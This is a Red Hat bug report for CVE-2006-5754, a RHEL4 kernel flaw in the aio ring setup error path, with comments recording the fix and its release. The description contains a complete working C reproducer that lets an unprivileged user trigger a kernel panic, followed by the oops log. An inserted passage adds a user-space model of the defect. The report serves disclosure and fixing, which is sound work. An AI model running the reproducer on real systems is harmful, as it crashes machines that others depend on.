Bug 220971 - CVE-2006-5754 kernel panic in aio_free_ring()
Summary: CVE-2006-5754 kernel panic in aio_free_ring()
Alias: None
Product: Red Hat Enterprise Linux 4
Classification: Red Hat
Component: kernel
Version: 4.4
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Jeff Moyer
QA Contact: Brian Brock
Whiteboard: impact=important,source=vendorsec,rep...
Depends On:
Reported: 2006-12-29 19:43 UTC by Vasily Averin
Modified: 2008-01-09 17:29 UTC (History)

Fixed In Version: RHSA-2007-0014
Doc Type: Bug Fix
Doc Text:
Clone Of:
Last Closed: 2007-01-30 14:45:10 UTC
Target Upstream Version:


System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2007:0014 0 normal SHIPPED_LIVE Important: kernel security update 2007-01-30 14:25:00 UTC

Description Vasily Averin 2006-12-29 19:43:42 UTC
Konstantin Khorenko from the OpenVZ/Virtuozzo Linux kernel team has noticed the
following issue on the RHEL4 2.6.9-42.0.3 kernel.

The aio_setup_ring() function initializes the info->nr_pages variable incorrectly;
this variable is then used in the error path to free the allocated resources. In
this way an unprivileged user can crash the node.

This issue was fixed in the 2.6.10 kernel by the following patch:

[finist@svconsole tmp]$ id
uid=500(finist) gid=501(finist) groups=501(finist)
[finist@svconsole tmp]$ uname -a
Linux svconsole.sw.ru 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006
i686 i686 i386 GNU/Linux

[finist@svconsole tmp]$ cat map_count.c
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
        long res;
        unsigned long ctx = 0;
        int i = 0;
        void* map;

        /* Alternate PROT_READ and PROT_WRITE so adjacent anonymous mappings
         * are not merged into one VMA; stop when mmap() refuses a new one. */
        while (1 == 1) {
                map = mmap(NULL, 100, PROT_READ, MAP_ANONYMOUS|MAP_PRIVATE,
                        0, 0);
                if (map == MAP_FAILED)
                        break;
                i++;
                map = mmap(NULL, 100, PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE,
                         0, 0);
                if (map == MAP_FAILED)
                        break;
                i++;
        }
        printf("Done %d mmaps.\n", i);

        /* With the map count exhausted, io_setup() takes its error path. */
        res = syscall(__NR_io_setup, 10000, &ctx);
        if (res != 0) {
                printf("Error in io_setup():%ld\n", res);
        }
        return 0;
}
[finist@svconsole tmp]$ cat /proc/sys/vm/max_map_count
[finist@svconsole tmp]$ ./map_count
Done 65526 mmaps.
crash here.

mmap err: 12
Unable to handle kernel NULL pointer dereference at virtual address 00000000
 printing eip:
*pde = 0eb55001
Oops: 0000 [#1]
Modules linked in: ip_nat_irc ip_nat_ftp iptable_nat ipt_helper ipt_state
ipt_conntrack ip_conntrack_irc ip_conntrack_ftp ip_conntrack ipt_length ipt_LOG
ipt_ttl ipt_tcpmss ipt_REJECT ipt_TOS ipt_tos ipt_multiport ipt_limit
iptable_mangle md5 ipv6 8021q bridge atm iptable_filter ip_tables dm_mirror
dm_mod uhci_hcd 3c59x mii floppy ext3 jbd
CPU:    0
EIP:    0060:[<c01489de>]    Not tainted VLI
EFLAGS: 00010203   (2.6.9-42.0.3.ELsmp)
EIP is at put_page+0x2/0x6d
eax: 00000000   ebx: 00000001   ecx: cf679f7c   edx: 00000000
esi: cfb9c610   edi: cc4dbbc4   ebp: cc4dbb80   esp: cf679f60
ds: 007b   es: 007b   ss: 0068
Process map_count (pid: 3130, threadinfo=cf679000 task=cf3fed10)
Stack: c017a158 cfb9c5e0 cfb9c610 cff0073c cc4dbbc4 c017a30c c02e9bda 0000000c
       0000004f 0000277f cc4dbb80 00002710 cc4dbb80 cfb9c5e0 cf679000 c017a4d3
       bffffa80 ffffffea 00000000 c017b628 00002710 00000000 00000000 cf679000
Call Trace:
 [<c017a158>] aio_free_ring+0x1c/0x9f
 [<c017a30c>] aio_setup_ring+0x131/0x203
 [<c017a4d3>] ioctx_alloc+0xf5/0x17f
 [<c017b628>] sys_io_setup+0x39/0xa5
 [<c02d47cb>] syscall_call+0x7/0xb
 [<c02d007b>] packet_rcv+0x17e/0x307
Code: 35 94 18 00 e9 da fa ff ff e8 4f 94 18 00 e9 6f fb ff ff e8 21 94 18 00 e9
57 fe ff ff e8 3b 94 18 00 e9 d6 fe ff ff 90 90 89 c2 <8b> 00 f6 c4 80 74 2f 8b
52 0c 8b 02 89 d1 f6 c4 80 74 03 8b 4a
 <0>Fatal exception: panic in 5 seconds
Kernel panic - not syncing: Fatal exception

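The defect the description points at, an error path that trusts a page count recorded before any page was actually obtained, is easier to see in a small user-space model. The C program below is an added example written for this page; it is not the kernel source, the reproducer, or the 2.6.10 patch, and `struct ring_info`, `setup_ring`, `free_ring`, `pin_page` and `put_page_checked` are constructed stand-ins for the kernel objects. It drives the same failure the reproducer causes (the ring mmap failing with ENOMEM, errno 12, consistent with the `mmap err: 12` line in the log) through two shapes of the setup code: one that writes `nr_pages` before pinning, so cleanup walks a table of NULL entries, and one whose count only ever reflects pages actually obtained.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed stand-ins for the kernel objects; not kernel code. */
struct page { int refcount; };

struct ring_info {
    unsigned long nr_pages;     /* how many entries free_ring() will release */
    struct page **ring_pages;   /* entries stay NULL until a page is pinned */
};

/* Stand-in for put_page(). The real one dereferences its argument, which is
 * the NULL pointer dereference in the oops; the model counts it instead. */
static int put_page_checked(struct page *p)
{
    if (p == NULL) return 1;            /* real put_page() would oops here */
    if (--p->refcount == 0) free(p);
    return 0;
}

static struct page *pin_page(void)
{
    struct page *p = calloc(1, sizeof *p);
    if (p) p->refcount = 1;
    return p;
}

/* Cleanup in the shape of aio_free_ring(): it trusts nr_pages. Returns how
 * many NULL entries it handed to put_page_checked(). */
static int free_ring(struct ring_info *info)
{
    int null_puts = 0;
    for (unsigned long i = 0; i < info->nr_pages; i++)
        null_puts += put_page_checked(info->ring_pages[i]);
    free(info->ring_pages);
    info->ring_pages = NULL;
    info->nr_pages = 0;
    return null_puts;
}

/* Allocate the page table, "mmap", then pin pages. With count_before_pin set,
 * nr_pages is written before anything is pinned (the defective shape); with
 * it clear, nr_pages only ever counts pages actually obtained.
 * Returns 0 on success, -1 on failure; *null_puts reports what cleanup did. */
static int setup_ring(struct ring_info *info, unsigned long nr_pages,
                      int mmap_fails, int count_before_pin, int *null_puts)
{
    unsigned long got = 0;

    *null_puts = 0;
    info->nr_pages = 0;
    info->ring_pages = calloc(nr_pages, sizeof *info->ring_pages);
    if (!info->ring_pages)
        return -1;

    if (count_before_pin)
        info->nr_pages = nr_pages;      /* optimistic: nothing pinned yet */

    if (mmap_fails) {                   /* simulated do_mmap() -> -ENOMEM */
        *null_puts = free_ring(info);   /* every ring_pages[] entry is NULL */
        return -1;
    }

    for (; got < nr_pages; got++) {
        info->ring_pages[got] = pin_page();
        if (!info->ring_pages[got])
            break;
    }
    if (!count_before_pin)
        info->nr_pages = got;           /* count matches what was pinned */
    if (got != nr_pages) {
        *null_puts = free_ring(info);
        return -1;
    }
    return 0;
}

/* Run one scenario with a four-page ring and return how many NULL pages the
 * cleanup touched, on the error path or on normal teardown after success. */
int null_puts_in_cleanup(int count_before_pin, int mmap_fails)
{
    struct ring_info info = { 0, NULL };
    int null_puts;

    if (setup_ring(&info, 4, mmap_fails, count_before_pin, &null_puts) == 0)
        null_puts = free_ring(&info);   /* success: normal teardown */
    return null_puts;
}

int main(void)
{
    printf("count before pinning, mmap fails: %d NULL put_page() calls\n",
           null_puts_in_cleanup(1, 1));
    printf("count after pinning,  mmap fails: %d NULL put_page() calls\n",
           null_puts_in_cleanup(0, 1));
    return 0;
}
```

The point a reviewer looks for in error paths of this kind: the counter that cleanup trusts must never be ahead of the resources actually held, so either set it only after each successful step or have cleanup skip NULL entries.
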
Comment 3 Jason Baron 2007-01-10 19:24:17 UTC
Committed in stream U5 build 42.40. A test kernel with this patch is available
from http://people.redhat.com/~jbaron/rhel4/

Comment 5 Mike Gahagan 2007-01-19 15:59:20 UTC
Fix verified on 42.0.7 with the included testcase.

Comment 7 Red Hat Bugzilla 2007-01-30 14:45:10 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
